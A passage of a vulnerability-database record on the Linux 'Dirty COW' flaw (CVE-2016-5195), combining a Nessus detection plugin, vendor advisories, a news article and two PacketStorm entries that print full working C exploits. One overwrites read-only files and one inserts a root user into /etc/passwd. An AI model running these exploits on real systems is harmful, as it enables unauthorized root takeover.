value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-5195\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2016:2098\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:2098\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-abi-whitelists-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-devel-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-devel-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-doc-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-headers-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-devel-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-debuginfo-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-debuginfo-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-327.36.3.el7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-10-22T01:27:52", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "edition": 1, "description": "The SUSE Linux Enterprise 11 SP2 LTSS kernel was updated to fix one\n security issue.\n\n This security bug was fixed:\n\n - CVE-2016-5195: Local privilege escalation using MAP_PRIVATE. It is\n reportedly exploited in the wild (bsc#1004418).\n\n", "modified": "2016-10-22T00:10:22", "published": "2016-10-22T00:10:22", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00040.html", "id": "SUSE-SU-2016:2596-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-10-27T01:27:51", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "edition": 1, "description": "This update for the Linux Kernel 3.12.60-52_54 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-5195: A local privilege escalation using MAP_PRIVATE was fixed,\n which is reportedly exploited in the wild (bsc#1004419).\n\n", "modified": "2016-10-27T01:06:19", "published": "2016-10-27T01:06:19", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00065.html", "id": "SUSE-SU-2016:2657-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 15 for SLE 12 (important)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-10-21T21:28:03", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "edition": 1, "description": "The SUSE Linux Enterprise 12 GA LTSS kernel was updated to fix two issues.\n\n This security bug was fixed:\n\n - CVE-2016-5195: Local privilege escalation using MAP_PRIVATE. It is\n reportedly exploited in the wild (bsc#1004418).\n\n This non-security bug was fixed:\n\n - sched/core: Fix a race between try_to_wake_up() and a woken up task\n (bsc#1002165, bsc#1001419).\n\n", "modified": "2016-10-21T21:08:21", "published": "2016-10-21T21:08:21", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00039.html", "id": "SUSE-SU-2016:2593-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-10-21T17:27:49", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "edition": 1, "description": "The SUSE Linux Enterprise 12 SP1 kernel was updated to fix two issues.\n\n This security bug was fixed:\n\n - CVE-2016-5195: Local privilege escalation using MAP_PRIVATE. It is\n reportedly exploited in the wild (bsc#1004418).\n\n This non-security bug was fixed:\n\n - sched/core: Fix a race between try_to_wake_up() and a woken up task\n (bsc#1002165, bsc#1001419).\n\n", "modified": "2016-10-21T19:14:25", "published": "2016-10-21T19:14:25", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00038.html", "id": "SUSE-SU-2016:2592-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 0.0, "vector": "NONE"}}], "canvas": [{"lastseen": "2019-05-29T19:48:29", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "edition": 2, "description": "**Name**| linux_foll_write_cow \n---|--- \n**CVE**| CVE-2016-5195 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Linux Kernel FOLL_WRITE gup COW local privilege escalation \n**Notes**| Repeatability: Multiple Times \nNotes: \n \nTested on: \n\\- RedHat 7 \n\\- Ubuntu 14 \n\\- Ubuntu 16 \n \n \nVENDOR: Linux \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195 \nCVE Name: CVE-2016-5195 \n\n", "modified": "2016-11-10T21:59:00", "published": "2016-11-10T21:59:00", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/linux_foll_write_cow", "id": "LINUX_FOLL_WRITE_COW", "type": "canvas", "title": "Immunity Canvas: LINUX_FOLL_WRITE_COW", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "paloalto": [{"lastseen": "2020-12-24T13:20:55", "bulletinFamily": "software", "cvelist": ["CVE-2016-5195"], "description": "A vulnerability exists in the kernel of PAN-OS that may result in an elevation of privilege. This issue is publicly known as Dirty COW (ref # PAN-68074 / CVE-2016-5195).\nPAN-OS may be impacted by the Dirty COW (CVE-2016-5195) attack. A race condition was found in the way the Linux kernel's memory subsystem handles the copy-on-write breakage of private read-only memory mappings. An attacker would first require access to a shell on the device before they could use this exploit. Shell access is significantly restricted on the device. The Command Line Interface (CLI) is not shell access and therefore this issue cannot be exploited by the CLI.\nThis issue affects PAN-OS 5.1, PAN-OS 6.0, PAN-OS 6.1, PAN-OS 7.0.13, PAN-OS 7.1.7 and earlier\n\n\n**Work around:**\nPalo Alto Networks recommends to implement best practice by allowing web interface access only to a dedicated management network. Additionally, restrict the set of IP addresses to a subset of authorized sources that you allow to interact with the management network.\n", "edition": 6, "modified": "2017-02-21T19:30:00", "published": "2017-02-21T19:30:00", "id": "PAN-SA-2017-0003", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2016-5195", "title": "Kernel Vulnerability ", "type": "paloalto", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:07", "description": "", "published": "2016-11-25T00:00:00", "type": "packetstorm", "title": "Linux Kernel Dirty COW PTRACE_POKEDATA Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-25T00:00:00", "id": "PACKETSTORM:139922", "href": "https://packetstormsecurity.com/files/139922/Linux-Kernel-Dirty-COW-PTRACE_POKEDATA-Privilege-Escalation.html", "sourceData": "`// $ echo pikachu|sudo tee pokeball;ls -l pokeball;gcc -pthread pokemon.c -o d;./d pokeball miltank;cat pokeball \n#include <fcntl.h> //// pikachu \n#include <pthread.h> //// -rw-r--r-- 1 root root 8 Apr 4 12:34 pokeball \n#include <string.h> //// pokeball \n#include <stdio.h> //// (___) \n#include <stdint.h> //// (o o)_____/ \n#include <sys/mman.h> //// @@ ` \\ \n#include <sys/types.h> //// \\ ____, /miltank \n#include <sys/stat.h> //// // // \n#include <sys/wait.h> //// ^^ ^^ \n#include <sys/ptrace.h> //// mmap bc757000 \n#include <unistd.h> //// madvise 0 \n////////////////////////////////////////////// ptrace 0 \n////////////////////////////////////////////// miltank \n////////////////////////////////////////////// \nint f ;// file descriptor \nvoid *map ;// memory map \npid_t pid ;// process id \npthread_t pth ;// thread \nstruct stat st ;// file info \n////////////////////////////////////////////// \nvoid *madviseThread(void *arg) {// madvise thread \nint i,c=0 ;// counters \nfor(i=0;i<200000000;i++)//////////////////// loop to 2*10**8 \nc+=madvise(map,100,MADV_DONTNEED) ;// race condition \nprintf(\"madvise %d\\n\\n\",c) ;// sum of errors \n}// /madvise thread \n////////////////////////////////////////////// \nint main(int argc,char *argv[]) {// entrypoint \nif(argc<3)return 1 ;// ./d file contents \nprintf(\"%s \\n\\ \n(___) \\n\\ \n(o o)_____/ \\n\\ \n@@ ` \\\\ \\n\\ \n\\\\ ____, /%s \\n\\ \n// // \\n\\ \n^^ ^^ \\n\\ \n\", argv[1], argv[2]) ;// dirty cow \nf=open(argv[1],O_RDONLY) ;// open read only file \nfstat(f,&st) ;// stat the fd \nmap=mmap(NULL ,// mmap the file \nst.st_size+sizeof(long) ,// size is filesize plus padding \nPROT_READ ,// read-only \nMAP_PRIVATE ,// private mapping for cow \nf ,// file descriptor \n0) ;// zero \nprintf(\"mmap %lx\\n\\n\",(unsigned long)map);// sum of error code \npid=fork() ;// fork process \nif(pid) {// if parent \nwaitpid(pid,NULL,0) ;// wait for child \nint u,i,o,c=0,l=strlen(argv[2]) ;// util vars (l=length) \nfor(i=0;i<10000/l;i++)//////////////////// loop to 10K divided by l \nfor(o=0;o<l;o++)//////////////////////// repeat for each byte \nfor(u=0;u<10000;u++)////////////////// try 10K times each time \nc+=ptrace(PTRACE_POKETEXT ,// inject into memory \npid ,// process id \nmap+o ,// address \n*((long*)(argv[2]+o))) ;// value \nprintf(\"ptrace %d\\n\\n\",c) ;// sum of error code \n}// otherwise \nelse {// child \npthread_create(&pth ,// create new thread \nNULL ,// null \nmadviseThread ,// run madviseThred \nNULL) ;// null \nptrace(PTRACE_TRACEME) ;// stat ptrace on child \nkill(getpid(),SIGSTOP) ;// signal parent \npthread_join(pth,NULL) ;// wait for thread \n}// / child \nreturn 0 ;// return \n}// / entrypoint \n////////////////////////////////////////////// \n \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/139922/dirtycowptrace-escalate.txt"}, {"lastseen": "2016-12-05T22:19:16", "description": "", "published": "2016-11-28T00:00:00", "type": "packetstorm", "title": "Linux Kernel Dirty COW PTRACE_POKEDATA Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-28T00:00:00", "id": "PACKETSTORM:139923", "href": "https://packetstormsecurity.com/files/139923/Linux-Kernel-Dirty-COW-PTRACE_POKEDATA-Privilege-Escalation.html", "sourceData": "`// \n// This exploit uses the pokemon exploit as a base and automatically \n// generates a new passwd line. The original /etc/passwd is then \n// backed up to /tmp/passwd.bak and overwritten with the new line. \n// The user will be prompted for the new password when the binary is run. \n// After running the exploit you should be able to login with the newly \n// created user. \n// \n// Original exploit: \n// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c \n// \n// To use this exploit modify the user values according to your needs \n// \n// Compile with \n// \n// gcc -pthread dirty.c -o dirty -lcrypt \n// \n// and just run the newly create binary with ./dirty \n// \n// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT ! \n// \n// Exploit adopted by Christian \"FireFart\" Mehlmauer \n// https://firefart.at \n// \n \n \n#include <fcntl.h> \n#include <pthread.h> \n#include <string.h> \n#include <stdio.h> \n#include <stdint.h> \n#include <sys/mman.h> \n#include <sys/types.h> \n#include <sys/stat.h> \n#include <sys/wait.h> \n#include <sys/ptrace.h> \n#include <stdlib.h> \n#include <unistd.h> \n#include <crypt.h> \n \nconst char *filename = \"/etc/passwd\"; \nconst char *backup_filename = \"/tmp/passwd.bak\"; \nconst char *salt = \"firefart\"; \n \nint f; \nvoid *map; \npid_t pid; \npthread_t pth; \nstruct stat st; \n \nstruct Userinfo { \nchar *username; \nchar *hash; \nint user_id; \nint group_id; \nchar *info; \nchar *home_dir; \nchar *shell; \n}; \n \nchar *generate_password_hash(char *plaintext_pw) { \nreturn crypt(plaintext_pw, salt); \n} \n \nchar *generate_passwd_line(struct Userinfo u) { \nconst char *format = \"%s:%s:%d:%d:%s:%s:%s\\n\"; \nint size = snprintf(NULL, 0, format, u.username, u.hash, \nu.user_id, u.group_id, u.info, u.home_dir, u.shell); \nchar *ret = malloc(size + 1); \nsprintf(ret, format, u.username, u.hash, u.user_id, \nu.group_id, u.info, u.home_dir, u.shell); \nreturn ret; \n} \n \nvoid *madviseThread(void *arg) { \nint i, c = 0; \nfor(i = 0; i < 200000000; i++) { \nc += madvise(map, 100, MADV_DONTNEED); \n} \nprintf(\"madvise %d\\n\\n\", c); \n} \n \nint copy_file(const char *from, const char *to) { \n// check if target file already exists \nif(access(to, F_OK) != -1) { \nprintf(\"File %s already exists! Please delete it and run again\\n\", \nto); \nreturn -1; \n} \n \nchar ch; \nFILE *source, *target; \n \nsource = fopen(from, \"r\"); \nif(source == NULL) { \nreturn -1; \n} \ntarget = fopen(to, \"w\"); \nif(target == NULL) { \nfclose(source); \nreturn -1; \n} \n \nwhile((ch = fgetc(source)) != EOF) { \nfputc(ch, target); \n} \n \nprintf(\"%s successfully backed up to %s\\n\", \nfrom, to); \n \nfclose(source); \nfclose(target); \n \nreturn 0; \n} \n \nint main(int argc, char *argv[]) \n{ \n// backup file \nint ret = copy_file(filename, backup_filename); \nif (ret != 0) { \nexit(ret); \n} \n \nstruct Userinfo user; \n// set values, change as needed \nuser.username = \"firefart\"; \nuser.user_id = 0; \nuser.group_id = 0; \nuser.info = \"pwned\"; \nuser.home_dir = \"/root\"; \nuser.shell = \"/bin/bash\"; \n \nchar *plaintext_pw = getpass(\"Please enter new password: \"); \nuser.hash = generate_password_hash(plaintext_pw); \nchar *complete_passwd_line = generate_passwd_line(user); \nprintf(\"Complete line:\\n%s\\n\", complete_passwd_line); \n \nf = open(filename, O_RDONLY); \nfstat(f, &st); \nmap = mmap(NULL, \nst.st_size + sizeof(long), \nPROT_READ, \nMAP_PRIVATE, \nf, \n0); \nprintf(\"mmap: %lx\\n\",(unsigned long)map); \npid = fork(); \nif(pid) { \nwaitpid(pid, NULL, 0); \nint u, i, o, c = 0; \nint l=strlen(complete_passwd_line); \nfor(i = 0; i < 10000/l; i++) { \nfor(o = 0; o < l; o++) { \nfor(u = 0; u < 10000; u++) { \nc += ptrace(PTRACE_POKETEXT, \npid, \nmap + o, \n*((long*)(complete_passwd_line + o))); \n} \n} \n} \nprintf(\"ptrace %d\\n\",c); \n} \nelse { \npthread_create(&pth, \nNULL, \nmadviseThread, \nNULL); \nptrace(PTRACE_TRACEME); \nkill(getpid(), SIGSTOP); \npthread_join(pth,NULL); \n} \n \nprintf(\"Done! Check %s to see if the new user was created\\n\", filename); \nprintf(\"You can log in with username %s and password %s.\\n\\n\", \nuser.username, plaintext_pw); \nprintf(\"\\nDON'T FORGET TO RESTORE %s FROM %s !!!\\n\\n\", \nfilename, backup_filename); \nreturn 0; \n} \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/139923/dirtydirtycow-escalate.txt"}], "amazon": [{"lastseen": "2020-11-10T12:35:54", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "**Issue Overview:**\n\nA race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.\n\n(Updated 2016-11-10: This advisory was upgraded to Critical.)\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. You will need to reboot your system in order for the new kernel to be running.\n\n \n\n\n**New Packages:**\n \n \n i686: \n kernel-4.4.23-31.54.amzn1.i686 \n kernel-devel-4.4.23-31.54.amzn1.i686 \n kernel-tools-debuginfo-4.4.23-31.54.amzn1.i686 \n kernel-tools-devel-4.4.23-31.54.amzn1.i686 \n kernel-debuginfo-common-i686-4.4.23-31.54.amzn1.i686 \n perf-4.4.23-31.54.amzn1.i686 \n kernel-debuginfo-4.4.23-31.54.amzn1.i686 \n perf-debuginfo-4.4.23-31.54.amzn1.i686 \n kernel-tools-4.4.23-31.54.amzn1.i686 \n kernel-headers-4.4.23-31.54.amzn1.i686 \n \n noarch: \n kernel-doc-4.4.23-31.54.amzn1.noarch \n \n src: \n kernel-4.4.23-31.54.amzn1.src \n \n x86_64: \n kernel-tools-devel-4.4.23-31.54.amzn1.x86_64 \n kernel-4.4.23-31.54.amzn1.x86_64 \n kernel-tools-debuginfo-4.4.23-31.54.amzn1.x86_64 \n perf-debuginfo-4.4.23-31.54.amzn1.x86_64 \n kernel-devel-4.4.23-31.54.amzn1.x86_64 \n kernel-tools-4.4.23-31.54.amzn1.x86_64 \n perf-4.4.23-31.54.amzn1.x86_64 \n kernel-debuginfo-4.4.23-31.54.amzn1.x86_64 \n kernel-headers-4.4.23-31.54.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.4.23-31.54.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2016-10-20T04:11:00", "published": "2016-10-20T04:11:00", "id": "ALAS-2016-757", "href": "https://alas.aws.amazon.com/ALAS-2016-757.html", "title": "Critical: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:18:04", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195"], "description": "[](<https://3.bp.blogspot.com/-iDWfxV-PPM8/WAnl79IpuHI/AAAAAAAAp5Y/5lTGfIqtuFYbi_zfNU_ORAiUfLceVljCACLcB/s1600/dirty-cow-linux-kernel-exploit.png>)\n\nA nine-year-old critical vulnerability has been discovered in virtually all versions of the Linux operating system and is actively being exploited in the wild. \n \nDubbed \"**Dirty COW**,\" the Linux kernel security flaw (CVE-2016-5195) is a mere privilege-escalation vulnerability, but researchers are taking it extremely seriously due to many reasons. \n \nFirst, it's very easy to develop exploits that work reliably. Secondly, the Dirty COW flaw exists in a section of the Linux kernel, which is a part of virtually every distro of the open-source operating system, including RedHat, Debian, and Ubuntu, released for almost a decade. \n \nAnd most importantly, the researchers have discovered attack code that indicates the Dirty COW vulnerability is being actively exploited in the wild. \n \nDirty COW potentially allows any installed malicious app to gain administrative (root-level) access to a device and completely hijack it within just 5 seconds. \n \nEarlier this week, [Linus Torvalds admitted](<https://lkml.org/lkml/2016/10/19/860>) that 11 years ago he first spotted this issue and also tried to fix it, but then he left it unpatched because at the time it was hard to trigger. \n \n\n\n### Why is the Flaw called Dirty COW?\n\n \nThe bug, marked as \"High\" priority, gets its name from the copy-on-write (COW) mechanism in the Linux kernel, which is so broken that any application or malicious program can tamper with read-only root-owned executable files and setuid executables. \n\n\n> \"A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings,\" reads the [website](<http://dirtycow.ninja/>) dedicated to Dirty COW. \n\n> \"An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.\"\n\nThe Dirty COW vulnerability has been present in the Linux kernel since version 2.6.22 in 2007, and is also believed to be present in Android, which is powered by the Linux kernel. \n \n\n\n### Patch Your Linux-powered Systems Immediately\n\n \nAccording to the website, the Linux kernel has been patched, and major vendors such as [RedHat](<https://access.redhat.com/security/cve/cve-2016-5195>), [Ubuntu](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html>) and [Debian](<https://security-tracker.debian.org/tracker/CVE-2016-5195>) have already rolled out fixes for their respective Linux distributions. \n \nOrganizations and individuals have been urged to install a patch for their Linux-powered systems, phones and gadgets as soon as possible and risk falling victim in order to kill off the Linux kernel-level security flaw affecting nearly every distro of the open-source OS. \n \nThe vulnerability was discovered by security researcher Phil Oester, who fund at least one in-the-wild attack exploiting this particular vulnerability. He found the exploit using an HTTP packet capture. \n\n\nThe vulnerability disclosure followed the tradition of branding high-profile security vulnerabilities like [Heartbleed](<https://thehackernews.com/2014/04/heartbleed-bug-explained-10-most.html>), [Poodle](<https://thehackernews.com/2014/10/poodle-ssl-30-attack-exploits-widely_14.html>), [FREAK](<https://thehackernews.com/2015/03/freak-openssl-vulnerability.html>), and [GHOST](<https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html>). \n \nThe Dirty COW website states: \n\n\n> \"It would have been fantastic to eschew this ridiculousness because we all make fun of branded vulnerabilities too, but this was not the right time to make that stand. So we created a website, an online shop, a Twitter account, and used a logo that a professional designer created.\"\n\nYou can find more technical details about the Dirty COW vulnerability and exploit on the bug's official [website](<http://dirtycow.ninja/>), [RedHat](<https://access.redhat.com/security/vulnerabilities/2706661>) site, and [GitHub](<https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails>) page.\n", "modified": "2016-10-25T15:07:13", "published": "2016-10-20T23:02:00", "id": "THN:B571C1AAA8CDDC10150ABA0BF22B19E6", "href": "https://thehackernews.com/2016/10/linux-kernel-exploit.html", "type": "thn", "title": "Dirty COW \u2014 Critical Linux Kernel Flaw Being Exploited in the Wild", "cvss": {"score": 7.2, "vector": 